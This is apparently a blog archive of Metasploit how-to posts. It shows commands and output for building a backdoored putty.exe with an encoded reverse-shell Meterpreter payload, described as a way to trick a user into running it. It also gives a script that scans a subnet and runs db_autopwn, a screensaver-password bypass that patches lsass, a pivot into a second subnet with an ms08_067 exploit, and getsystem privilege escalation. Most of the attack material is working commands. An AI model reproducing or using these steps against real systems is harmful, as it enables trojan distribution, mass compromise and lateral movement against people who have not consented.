Archive for the ‘metasploit’ Category

msfencoded payloads into executables (-k)

For a while now it has been possible to add msfencoded payloads into executable. However the resulting files would not work as expected. ie You could trick a user into running a file which would in turn give you a meterpreter session but the user would soon find that something was amiss with the exe……not any more.

http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896

./msfencode -h

Usage: ./msfencode
OPTIONS:
-a The architecture to encode as
-b The list of characters to avoid: ‘\x00\xff’
-c The number of times to encode the data
-e The encoder to use
-h Help banner
-i Encode the contents of the supplied file path
-k Keep template working; run payload in new thread (use with -x)
-l List available encoders
-m Specifies an additional module search path
-n Dump encoder information
-o The output file
-p The platform to encode for
-s The maximum size of the encoded data
-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)
-x Specify an alternate win32 executable template

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.199.129 LPORT=31337 R | ./msfencode -x putty.exe -t exe -k -o putty_backdoored.exe -e x86/shikata_ga_nai -c 10

[*] x86/shikata_ga_nai succeeded with size 315 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 477 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 504 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 531 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 558 (iteration=10

file putty_backdoored.exe
putty_backdoored.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.199.129
LHOST => 192.168.199.129
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.199.129:31337
[*] Starting the payload handler…
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.199.129:31337 -> 192.168.199.130:50766)

You’ll still need to migrate or your shell will terminate when the backdoored process is killed

msfconsole and db_autopwn

I just saw this on seclists.org.

HD Moore posted this to kick off db_autopwn via msfconsole RC script

$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r

$ msfconsole -r ownitall.rc

Passworded Screensaver Bypass

The Relentless-coding blog just released a script for meterpreter that will bypass password protection for screensavers in Windows XP (SP2 & 3), Vista, and Windows 7. The script patches the lsass (you’ll need system level permissions) process to circumvent the password check. Once applied, an attacker can insert anything for the password to unlock. PaulDotCom has a video on vimeo demonstrating it.

Automatically Route Through New Subnets with Metasploit

One of the coolest features of any exploitation framework is the ability to further penetrate the network via the exploited host. Here is how to pivot an attack in Metasploit:


msf exploit(ms09_002_memory_corruption) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.109:8080 -> 192.168.1.104:62239

msf exploit(ms09_002_memory_corruption) > ifconfig
[*] exec: ifconfig

eth0 Link encap:Ethernet HWaddr 00:0d:29:d9:ec:cc
inet addr:192.168.1.109 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fee8:ebe7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14826 errors:12824 dropped:0 overruns:0 frame:0
TX packets:6634 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7542708 (7.5 MB) TX bytes:2385453 (2.3 MB)
Interrupt:19 Base address:0x2024

msf exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > route

Network routes
==============

Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.55.2
192.168.55.0 255.255.255.0 192.168.55.140
192.168.55.140 255.255.255.255 127.0.0.1
127.0.0.0 255.0.0.0 127.0.0.1
224.0.0.0 240.0.0.0 192.168.55.140
255.255.255.255 255.255.255.255 192.168.55.140

meterpreter >
Background session 1? [y/N]y

msf exploit(ms09_002_memory_corruption) > route add 192.168.55.0 255.255.255.0 1
msf exploit(ms09_002_memory_corruption) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.55.0 255.255.255.0 Session 1

msf exploit(ms09_002_memory_corruption) > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/patchupmeterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.55.128
RHOST => 192.168.55.128
msf exploit(ms08_067_netapi) > set LPORT 9000
LPORT => 9000
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 2 - lang:English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (205835 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.1.109:9000 -> 192.168.1.104:62260)

meterpreter > execute -f cmd.exe -i
Process 3864 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32> ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 6:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.55.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.55.2

C:\WINDOWS\system32>exit

meterpreter >
Background session 2? [y/N]y

The problem is it requires a lot of typing. HD Moore has created a plug-in that automatically adds a route for previously unseen subnets when a new session opens up. Here is an example of its usage and output:


msf exploit(ms08_067_netapi) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.1:4444 -> 192.168.1.128:2355)
[*] AutoAddRoute: Routing new subnet 192.168.1.0/255.255.255.0 through session 1

meterpreter > background
msf exploit(ms08_067_netapi) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
192.168.1.0 255.255.255.0 Session 1

msf exploit(ms08_067_netapi) >

Awesome…..

meterpreter getsystem

meterpreter > use priv
Loading extension priv…success.

meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:

-h Help Banner.
-t The technique to use. (Default to ’0′).
0 : All techniques available
1 : Service – Named Pipe Impersonation (In Memory/Admin)
2 : Service – Named Pipe Impersonation (Dropper/Admin)
3 : Service – Token Duplication (In Memory/Admin)
4 : Exploit – KiTrap0D (In Memory/User)

meterpreter > getsystem -t 1
…got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 2
…got system (via technique 2).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 3
…got system (via technique 3).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid
Server username: MILLIWAYS\marvin

meterpreter > getsystem -t 4
…got system (via technique 4).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > rev2self

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

Return top